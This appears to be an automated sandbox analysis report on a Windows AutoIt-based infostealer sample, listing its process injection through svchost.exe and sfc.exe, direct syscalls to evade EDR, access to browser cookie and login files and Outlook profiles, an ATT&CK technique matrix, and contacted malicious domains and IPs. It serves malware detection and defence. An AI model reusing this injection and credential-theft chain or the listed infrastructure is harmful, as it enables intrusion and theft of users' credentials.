                Source: C:\Program Files (x86)\NRXJLWHxGJnVyGSVOYtebCFPdjyZCaZICsQoNwSkOBOGlH\p6WXW8QjBjt0nco5J.exeNtCreateKey: Direct from: 0x77752C6CJump to behavior
                Source: C:\Program Files (x86)\NRXJLWHxGJnVyGSVOYtebCFPdjyZCaZICsQoNwSkOBOGlH\p6WXW8QjBjt0nco5J.exeNtSetInformationThread: Direct from: 0x77752B4CJump to behavior
                Source: C:\Program Files (x86)\NRXJLWHxGJnVyGSVOYtebCFPdjyZCaZICsQoNwSkOBOGlH\p6WXW8QjBjt0nco5J.exeNtQueryAttributesFile: Direct from: 0x77752E6CJump to behavior
                Source: C:\Program Files (x86)\NRXJLWHxGJnVyGSVOYtebCFPdjyZCaZICsQoNwSkOBOGlH\p6WXW8QjBjt0nco5J.exeNtAllocateVirtualMemory: Direct from: 0x77753C9CJump to behavior
                Source: C:\Program Files (x86)\NRXJLWHxGJnVyGSVOYtebCFPdjyZCaZICsQoNwSkOBOGlH\p6WXW8QjBjt0nco5J.exeNtClose: Direct from: 0x77752B6C
                Source: C:\Program Files (x86)\NRXJLWHxGJnVyGSVOYtebCFPdjyZCaZICsQoNwSkOBOGlH\p6WXW8QjBjt0nco5J.exeNtCreateMutant: Direct from: 0x777535CCJump to behavior
                Source: C:\Program Files (x86)\NRXJLWHxGJnVyGSVOYtebCFPdjyZCaZICsQoNwSkOBOGlH\p6WXW8QjBjt0nco5J.exeNtWriteVirtualMemory: Direct from: 0x77752E3CJump to behavior
                Source: C:\Program Files (x86)\NRXJLWHxGJnVyGSVOYtebCFPdjyZCaZICsQoNwSkOBOGlH\p6WXW8QjBjt0nco5J.exeNtMapViewOfSection: Direct from: 0x77752D1CJump to behavior
                Source: C:\Program Files (x86)\NRXJLWHxGJnVyGSVOYtebCFPdjyZCaZICsQoNwSkOBOGlH\p6WXW8QjBjt0nco5J.exeNtResumeThread: Direct from: 0x777536ACJump to behavior
                Source: C:\Program Files (x86)\NRXJLWHxGJnVyGSVOYtebCFPdjyZCaZICsQoNwSkOBOGlH\p6WXW8QjBjt0nco5J.exeNtReadFile: Direct from: 0x77752ADCJump to behavior
                Source: C:\Program Files (x86)\NRXJLWHxGJnVyGSVOYtebCFPdjyZCaZICsQoNwSkOBOGlH\p6WXW8QjBjt0nco5J.exeNtQuerySystemInformation: Direct from: 0x77752DFCJump to behavior
                Source: C:\Program Files (x86)\NRXJLWHxGJnVyGSVOYtebCFPdjyZCaZICsQoNwSkOBOGlH\p6WXW8QjBjt0nco5J.exeNtDelayExecution: Direct from: 0x77752DDCJump to behavior
                Source: C:\Program Files (x86)\NRXJLWHxGJnVyGSVOYtebCFPdjyZCaZICsQoNwSkOBOGlH\p6WXW8QjBjt0nco5J.exeNtAllocateVirtualMemory: Direct from: 0x77752BFCJump to behavior
                Source: C:\Users\user\Desktop\yloe82Jp1k.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\NRXJLWHxGJnVyGSVOYtebCFPdjyZCaZICsQoNwSkOBOGlH\p6WXW8QjBjt0nco5J.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\sfc.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\sfc.exeSection loaded: NULL target: C:\Program Files (x86)\NRXJLWHxGJnVyGSVOYtebCFPdjyZCaZICsQoNwSkOBOGlH\p6WXW8QjBjt0nco5J.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\sfc.exeSection loaded: NULL target: C:\Program Files (x86)\NRXJLWHxGJnVyGSVOYtebCFPdjyZCaZICsQoNwSkOBOGlH\p6WXW8QjBjt0nco5J.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\sfc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\sfc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\sfc.exeThread register set: target process: 2224Jump to behavior
                Source: C:\Windows\SysWOW64\sfc.exeThread APC queued: target process: C:\Program Files (x86)\NRXJLWHxGJnVyGSVOYtebCFPdjyZCaZICsQoNwSkOBOGlH\p6WXW8QjBjt0nco5J.exeJump to behavior
                Source: C:\Users\user\Desktop\yloe82Jp1k.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2D87008Jump to behavior
                Source: C:\Users\user\Desktop\yloe82Jp1k.exeCode function: 0_2_007D8C93 LogonUserW,0_2_007D8C93
                Source: C:\Users\user\Desktop\yloe82Jp1k.exeCode function: 0_2_00783B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00783B4C
                Source: C:\Users\user\Desktop\yloe82Jp1k.exeCode function: 0_2_00784A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00784A35
                Source: C:\Users\user\Desktop\yloe82Jp1k.exeCode function: 0_2_007E4EF5 mouse_event,0_2_007E4EF5
                Source: C:\Users\user\Desktop\yloe82Jp1k.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\yloe82Jp1k.exe"Jump to behavior
                Source: C:\Program Files (x86)\NRXJLWHxGJnVyGSVOYtebCFPdjyZCaZICsQoNwSkOBOGlH\p6WXW8QjBjt0nco5J.exeProcess created: C:\Windows\SysWOW64\sfc.exe "C:\Windows\SysWOW64\sfc.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\sfc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\yloe82Jp1k.exeCode function: 0_2_007D81F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_007D81F7
                Source: C:\Users\user\Desktop\yloe82Jp1k.exeCode function: 0_2_007E4C03 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_007E4C03
                Source: yloe82Jp1k.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: p6WXW8QjBjt0nco5J.exe, 00000008.00000000.1419077687.0000000001570000.00000002.00000001.00040000.00000000.sdmp, p6WXW8QjBjt0nco5J.exe, 00000008.00000002.3634691346.0000000001570000.00000002.00000001.00040000.00000000.sdmp, p6WXW8QjBjt0nco5J.exe, 0000000A.00000000.1571300690.0000000001481000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: XProgram Manager
                Source: yloe82Jp1k.exe, p6WXW8QjBjt0nco5J.exe, 00000008.00000000.1419077687.0000000001570000.00000002.00000001.00040000.00000000.sdmp, p6WXW8QjBjt0nco5J.exe, 00000008.00000002.3634691346.0000000001570000.00000002.00000001.00040000.00000000.sdmp, p6WXW8QjBjt0nco5J.exe, 0000000A.00000000.1571300690.0000000001481000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: p6WXW8QjBjt0nco5J.exe, 00000008.00000000.1419077687.0000000001570000.00000002.00000001.00040000.00000000.sdmp, p6WXW8QjBjt0nco5J.exe, 00000008.00000002.3634691346.0000000001570000.00000002.00000001.00040000.00000000.sdmp, p6WXW8QjBjt0nco5J.exe, 0000000A.00000000.1571300690.0000000001481000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: p6WXW8QjBjt0nco5J.exe, 00000008.00000000.1419077687.0000000001570000.00000002.00000001.00040000.00000000.sdmp, p6WXW8QjBjt0nco5J.exe, 00000008.00000002.3634691346.0000000001570000.00000002.00000001.00040000.00000000.sdmp, p6WXW8QjBjt0nco5J.exe, 0000000A.00000000.1571300690.0000000001481000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\yloe82Jp1k.exeCode function: 0_2_007A886B cpuid 0_2_007A886B
                Source: C:\Users\user\Desktop\yloe82Jp1k.exeCode function: 0_2_007B50D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_007B50D7
                Source: C:\Users\user\Desktop\yloe82Jp1k.exeCode function: 0_2_007C2230 GetUserNameW,0_2_007C2230
                Source: C:\Users\user\Desktop\yloe82Jp1k.exeCode function: 0_2_007B418A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_007B418A
                Source: C:\Users\user\Desktop\yloe82Jp1k.exeCode function: 0_2_00784AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00784AFE

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000009.00000002.3633190664.00000000025B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3635217909.0000000002CC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1495187860.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1496350328.0000000003690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3635090476.00000000035D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3635125168.0000000002C70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1497049983.0000000004550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\sfc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\sfc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\sfc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\sfc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\sfc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\sfc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\sfc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\sfc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\sfc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
                Source: yloe82Jp1k.exeBinary or memory string: WIN_81
                Source: yloe82Jp1k.exeBinary or memory string: WIN_XP
                Source: yloe82Jp1k.exeBinary or memory string: WIN_XPe
                Source: yloe82Jp1k.exeBinary or memory string: WIN_VISTA
                Source: yloe82Jp1k.exeBinary or memory string: WIN_7
                Source: yloe82Jp1k.exeBinary or memory string: WIN_8
                Source: yloe82Jp1k.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 4USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000009.00000002.3633190664.00000000025B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3635217909.0000000002CC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1495187860.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1496350328.0000000003690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3635090476.00000000035D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3635125168.0000000002C70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1497049983.0000000004550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\yloe82Jp1k.exeCode function: 0_2_007F6596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_007F6596
                Source: C:\Users\user\Desktop\yloe82Jp1k.exeCode function: 0_2_007F6A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_007F6A5A
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure2
                Valid Accounts
                1
                Native API
                1
                DLL Side-Loading
                1
                Exploitation for Privilege Escalation
                1
                Disable or Modify Tools
                1
                OS Credential Dumping
                2
                System Time Discovery
                Remote Services1
                Archive Collected Data
                4
                Ingress Tool Transfer
                Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault AccountsScheduled Task/Job2
                Valid Accounts
                1
                Abuse Elevation Control Mechanism
                1
                Deobfuscate/Decode Files or Information
                21
                Input Capture
                1
                Account Discovery
                Remote Desktop Protocol1
                Data from Local System
                1
                Encrypted Channel
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading
                1
                Abuse Elevation Control Mechanism
                Security Account Manager2
                File and Directory Discovery
                SMB/Windows Admin Shares1
                Email Collection
                4
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
                Valid Accounts
                3
                Obfuscated Files or Information
                NTDS116
                System Information Discovery
                Distributed Component Object Model21
                Input Capture
                4
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
                Access Token Manipulation
                1
                DLL Side-Loading
                LSA Secrets151
                Security Software Discovery
                SSH3
                Clipboard Data
                Fallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
                Process Injection
                2
                Valid Accounts
                Cached Domain Credentials2
                Virtualization/Sandbox Evasion
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                Virtualization/Sandbox Evasion
                DCSync3
                Process Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                Access Token Manipulation
                Proc Filesystem11
                Application Window Discovery
                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
                Process Injection
                /etc/passwd and /etc/shadow1
                System Owner/User Discovery
                Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1632415 Sample: yloe82Jp1k.exe Startdate: 07/03/2025 Architecture: WINDOWS Score: 100 28 www.l33900.xyz 2->28 30 www.031233226.xyz 2->30 32 17 other IPs or domains 2->32 42 Suricata IDS alerts for network traffic 2->42 44 Antivirus detection for URL or domain 2->44 46 Antivirus / Scanner detection for submitted sample 2->46 50 4 other signatures 2->50 10 yloe82Jp1k.exe 4 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 30->48 process4 signatures5 62 Binary is likely a compiled AutoIt script file 10->62 64 Writes to foreign memory regions 10->64 66 Maps a DLL or memory area into another process 10->66 68 Switches to a custom stack to bypass stack traces 10->68 13 svchost.exe 10->13         started        process6 signatures7 70 Maps a DLL or memory area into another process 13->70 16 p6WXW8QjBjt0nco5J.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 sfc.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 p6WXW8QjBjt0nco5J.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.cruycq.info 47.83.1.90, 49728, 49729, 49730 VODANETInternationalIP-BackboneofVodafoneDE United States 22->34 36 www.milp.store 194.9.94.85, 49740, 49741, 49742 LOOPIASE Sweden 22->36 38 7 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.